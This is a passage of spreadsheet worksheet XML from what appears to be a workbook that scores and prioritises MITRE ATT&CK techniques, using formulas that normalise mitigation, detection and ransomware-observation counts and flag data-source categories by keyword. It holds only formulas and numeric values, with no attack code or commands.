        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>50.842063492063495</v>
      </c>
      <c r="AR556" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS556" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT556" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU55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1.2343348450491307</v>
      </c>
    </row>
    <row r="557" spans="1:47" ht="34">
      <c r="A557" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B557" s="37">
        <f t="shared" si="8"/>
        <v>152.80280247619049</v>
      </c>
      <c r="C557" s="37" t="s">
        <v>1867</v>
      </c>
      <c r="D557" s="50" t="s">
        <v>1868</v>
      </c>
      <c r="E557" s="37"/>
      <c r="F557" s="37">
        <v>0</v>
      </c>
      <c r="G557" s="37">
        <v>1</v>
      </c>
      <c r="H557" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I557" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J557" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K557" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L557" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M557" s="37">
        <v>0</v>
      </c>
      <c r="N557" s="56">
        <v>0</v>
      </c>
      <c r="O557" s="56">
        <v>0</v>
      </c>
      <c r="P557" s="56">
        <v>0</v>
      </c>
      <c r="Q557" s="56">
        <v>0</v>
      </c>
      <c r="R557" s="57" t="s">
        <v>1869</v>
      </c>
      <c r="S557" s="57">
        <v>2</v>
      </c>
      <c r="T557" s="57"/>
      <c r="U557" s="57">
        <v>0</v>
      </c>
      <c r="V557" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.9047809523809526E-2</v>
      </c>
      <c r="W557" s="37">
        <v>2</v>
      </c>
      <c r="X557" s="37">
        <v>3.6364E-2</v>
      </c>
      <c r="Y557" s="37">
        <v>3.6364E-2</v>
      </c>
      <c r="Z557" s="37">
        <v>0</v>
      </c>
      <c r="AA557" s="37">
        <v>0</v>
      </c>
      <c r="AB557" s="37">
        <v>0</v>
      </c>
      <c r="AC557" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD557" s="50"/>
      <c r="AE557" s="37" t="str" cm="1">
        <f t="array" ref="AE557">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD557)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF557" s="37">
        <v>553</v>
      </c>
      <c r="AG557" s="37" t="str" cm="1">
        <f t="array" ref="AG557">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD557)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH557" s="37">
        <v>553</v>
      </c>
      <c r="AI557" s="37" t="str" cm="1">
        <f t="array" ref="AI557">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD557)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ557" s="37">
        <v>553</v>
      </c>
      <c r="AK557" s="37" t="str" cm="1">
        <f t="array" ref="AK557">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD557)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL557" s="37">
        <v>553</v>
      </c>
      <c r="AM557" s="37" t="str" cm="1">
        <f t="array" ref="AM557">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD557)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN557" s="37">
        <v>0</v>
      </c>
      <c r="AO557" s="37">
        <v>0</v>
      </c>
      <c r="AP557" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ557" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>50.934267492063498</v>
      </c>
      <c r="AR557" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS557" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT557" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU55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58" spans="1:47" ht="34">
      <c r="A558" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B558" s="37">
        <f t="shared" si="8"/>
        <v>153.07899371428573</v>
      </c>
      <c r="C558" s="37" t="s">
        <v>1870</v>
      </c>
      <c r="D558" s="50" t="s">
        <v>1868</v>
      </c>
      <c r="E558" s="37" t="s">
        <v>1871</v>
      </c>
      <c r="F558" s="37">
        <v>0</v>
      </c>
      <c r="G558" s="37">
        <v>1</v>
      </c>
      <c r="H558" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I558" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J558" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K558" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L558" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M558" s="37">
        <v>0</v>
      </c>
      <c r="N558" s="56">
        <v>0</v>
      </c>
      <c r="O558" s="56">
        <v>0</v>
      </c>
      <c r="P558" s="56">
        <v>0</v>
      </c>
      <c r="Q558" s="56">
        <v>0</v>
      </c>
      <c r="R558" s="57" t="s">
        <v>1869</v>
      </c>
      <c r="S558" s="57">
        <v>2</v>
      </c>
      <c r="T558" s="57"/>
      <c r="U558" s="57">
        <v>0</v>
      </c>
      <c r="V558" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.9047809523809526E-2</v>
      </c>
      <c r="W558" s="37">
        <v>2</v>
      </c>
      <c r="X558" s="37">
        <v>3.6364E-2</v>
      </c>
      <c r="Y558" s="37">
        <v>3.6364E-2</v>
      </c>
      <c r="Z558" s="37">
        <v>0</v>
      </c>
      <c r="AA558" s="37">
        <v>0</v>
      </c>
      <c r="AB558" s="37">
        <v>0</v>
      </c>
      <c r="AC558" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD558" s="50"/>
      <c r="AE558" s="37" t="str" cm="1">
        <f t="array" ref="AE558">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD558)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF558" s="37">
        <v>554</v>
      </c>
      <c r="AG558" s="37" t="str" cm="1">
        <f t="array" ref="AG558">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD558)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH558" s="37">
        <v>554</v>
      </c>
      <c r="AI558" s="37" t="str" cm="1">
        <f t="array" ref="AI558">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD558)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ558" s="37">
        <v>554</v>
      </c>
      <c r="AK558" s="37" t="str" cm="1">
        <f t="array" ref="AK558">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD558)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL558" s="37">
        <v>554</v>
      </c>
      <c r="AM558" s="37" t="str" cm="1">
        <f t="array" ref="AM558">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD558)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN558" s="37">
        <v>0</v>
      </c>
      <c r="AO558" s="37">
        <v>0</v>
      </c>
      <c r="AP558" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ558" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>51.026331238095246</v>
      </c>
      <c r="AR558" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS558" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT558" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU55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59" spans="1:47" ht="34">
      <c r="A559" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B559" s="37">
        <f t="shared" si="8"/>
        <v>153.35518495238097</v>
      </c>
      <c r="C559" s="37" t="s">
        <v>1872</v>
      </c>
      <c r="D559" s="50" t="s">
        <v>1868</v>
      </c>
      <c r="E559" s="37" t="s">
        <v>534</v>
      </c>
      <c r="F559" s="37">
        <v>0</v>
      </c>
      <c r="G559" s="37">
        <v>1</v>
      </c>
      <c r="H559" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I559" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J559" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K559" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L559" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M559" s="37">
        <v>0</v>
      </c>
      <c r="N559" s="56">
        <v>0</v>
      </c>
      <c r="O559" s="56">
        <v>0</v>
      </c>
      <c r="P559" s="56">
        <v>0</v>
      </c>
      <c r="Q559" s="56">
        <v>0</v>
      </c>
      <c r="R559" s="57" t="s">
        <v>1869</v>
      </c>
      <c r="S559" s="57">
        <v>2</v>
      </c>
      <c r="T559" s="57"/>
      <c r="U559" s="57">
        <v>0</v>
      </c>
      <c r="V559" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.9047809523809526E-2</v>
      </c>
      <c r="W559" s="37">
        <v>2</v>
      </c>
      <c r="X559" s="37">
        <v>3.6364E-2</v>
      </c>
      <c r="Y559" s="37">
        <v>3.6364E-2</v>
      </c>
      <c r="Z559" s="37">
        <v>0</v>
      </c>
      <c r="AA559" s="37">
        <v>0</v>
      </c>
      <c r="AB559" s="37">
        <v>0</v>
      </c>
      <c r="AC559" s="37"/>
      <c r="AD559" s="50"/>
      <c r="AE559" s="37" t="str" cm="1">
        <f t="array" ref="AE559">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD559)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF559" s="37">
        <v>555</v>
      </c>
      <c r="AG559" s="37" t="str" cm="1">
        <f t="array" ref="AG559">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD559)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH559" s="37">
        <v>555</v>
      </c>
      <c r="AI559" s="37" t="str" cm="1">
        <f t="array" ref="AI559">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD559)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ559" s="37">
        <v>555</v>
      </c>
      <c r="AK559" s="37" t="str" cm="1">
        <f t="array" ref="AK559">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD559)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL559" s="37">
        <v>555</v>
      </c>
      <c r="AM559" s="37" t="str" cm="1">
        <f t="array" ref="AM559">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD559)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN559" s="37">
        <v>0</v>
      </c>
      <c r="AO559" s="37">
        <v>0</v>
      </c>
      <c r="AP559" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ559" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>51.118394984126986</v>
      </c>
      <c r="AR559" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS559" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT559" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU55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60" spans="1:47" ht="34">
      <c r="A560" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B560" s="37">
        <f t="shared" si="8"/>
        <v>111.25</v>
      </c>
      <c r="C560" s="37" t="s">
        <v>1873</v>
      </c>
      <c r="D560" s="50" t="s">
        <v>1868</v>
      </c>
      <c r="E560" s="37" t="s">
        <v>1874</v>
      </c>
      <c r="F560" s="37">
        <v>0</v>
      </c>
      <c r="G560" s="37">
        <v>1</v>
      </c>
      <c r="H560" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I560" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J560" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K560" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L560" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M560" s="37">
        <v>0</v>
      </c>
      <c r="N560" s="56">
        <v>0</v>
      </c>
      <c r="O560" s="56">
        <v>0</v>
      </c>
      <c r="P560" s="56">
        <v>0</v>
      </c>
      <c r="Q560" s="56">
        <v>0</v>
      </c>
      <c r="R560" s="57"/>
      <c r="S560" s="57">
        <v>0</v>
      </c>
      <c r="T560" s="57"/>
      <c r="U560" s="57">
        <v>0</v>
      </c>
      <c r="V560" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W560" s="37">
        <v>0</v>
      </c>
      <c r="X560" s="37">
        <v>0</v>
      </c>
      <c r="Y560" s="37">
        <v>0</v>
      </c>
      <c r="Z560" s="37">
        <v>0</v>
      </c>
      <c r="AA560" s="37">
        <v>0</v>
      </c>
      <c r="AB560" s="37">
        <v>0</v>
      </c>
      <c r="AC560" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD560" s="50"/>
      <c r="AE560" s="37" t="str" cm="1">
        <f t="array" ref="AE560">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD560)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF560" s="37">
        <v>556</v>
      </c>
      <c r="AG560" s="37" t="str" cm="1">
        <f t="array" ref="AG560">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD560)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH560" s="37">
        <v>556</v>
      </c>
      <c r="AI560" s="37" t="str" cm="1">
        <f t="array" ref="AI560">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD560)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ560" s="37">
        <v>556</v>
      </c>
      <c r="AK560" s="37" t="str" cm="1">
        <f t="array" ref="AK560">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD560)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL560" s="37">
        <v>556</v>
      </c>
      <c r="AM560" s="37" t="str" cm="1">
        <f t="array" ref="AM560">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD560)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN560" s="37">
        <v>0</v>
      </c>
      <c r="AO560" s="37">
        <v>0</v>
      </c>
      <c r="AP560" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ560" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>37.083333333333336</v>
      </c>
      <c r="AR560" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS560" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT560" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU56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61" spans="1:47" ht="34">
      <c r="A561" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B561" s="37">
        <f t="shared" si="8"/>
        <v>175.13613885714287</v>
      </c>
      <c r="C561" s="37" t="s">
        <v>1875</v>
      </c>
      <c r="D561" s="50" t="s">
        <v>1868</v>
      </c>
      <c r="E561" s="37" t="s">
        <v>1876</v>
      </c>
      <c r="F561" s="37">
        <v>0</v>
      </c>
      <c r="G561" s="37">
        <v>1</v>
      </c>
      <c r="H561" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I561" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J561" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K561" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L561" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M561" s="37">
        <v>0</v>
      </c>
      <c r="N561" s="56">
        <v>0</v>
      </c>
      <c r="O561" s="56">
        <v>0</v>
      </c>
      <c r="P561" s="56">
        <v>0</v>
      </c>
      <c r="Q561" s="56">
        <v>2</v>
      </c>
      <c r="R561" s="57" t="s">
        <v>1869</v>
      </c>
      <c r="S561" s="57">
        <v>2</v>
      </c>
      <c r="T561" s="57"/>
      <c r="U561" s="57">
        <v>0</v>
      </c>
      <c r="V561" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>2.8571619047619047E-2</v>
      </c>
      <c r="W561" s="37">
        <v>2</v>
      </c>
      <c r="X561" s="37">
        <v>3.6364E-2</v>
      </c>
      <c r="Y561" s="37">
        <v>3.6364E-2</v>
      </c>
      <c r="Z561" s="37">
        <v>2</v>
      </c>
      <c r="AA561" s="37">
        <v>0.02</v>
      </c>
      <c r="AB561" s="37">
        <v>0.02</v>
      </c>
      <c r="AC561" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD561" s="50"/>
      <c r="AE561" s="37" t="str" cm="1">
        <f t="array" ref="AE561">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD561)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF561" s="37">
        <v>557</v>
      </c>
      <c r="AG561" s="37" t="str" cm="1">
        <f t="array" ref="AG561">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD561)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH561" s="37">
        <v>557</v>
      </c>
      <c r="AI561" s="37" t="str" cm="1">
        <f t="array" ref="AI561">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD561)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ561" s="37">
        <v>557</v>
      </c>
      <c r="AK561" s="37" t="str" cm="1">
        <f t="array" ref="AK561">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD561)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL561" s="37">
        <v>557</v>
      </c>
      <c r="AM561" s="37" t="str" cm="1">
        <f t="array" ref="AM561">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD561)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN561" s="37">
        <v>0</v>
      </c>
      <c r="AO561" s="37">
        <v>0</v>
      </c>
      <c r="AP561" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ561" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>58.378712952380958</v>
      </c>
      <c r="AR561" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS561" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT561" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU56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62" spans="1:47" ht="34">
      <c r="A562" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B562" s="37">
        <f t="shared" si="8"/>
        <v>154.18375866666668</v>
      </c>
      <c r="C562" s="37" t="s">
        <v>1877</v>
      </c>
      <c r="D562" s="50" t="s">
        <v>1868</v>
      </c>
      <c r="E562" s="37" t="s">
        <v>1878</v>
      </c>
      <c r="F562" s="37">
        <v>0</v>
      </c>
      <c r="G562" s="37">
        <v>1</v>
      </c>
      <c r="H562" s="37">
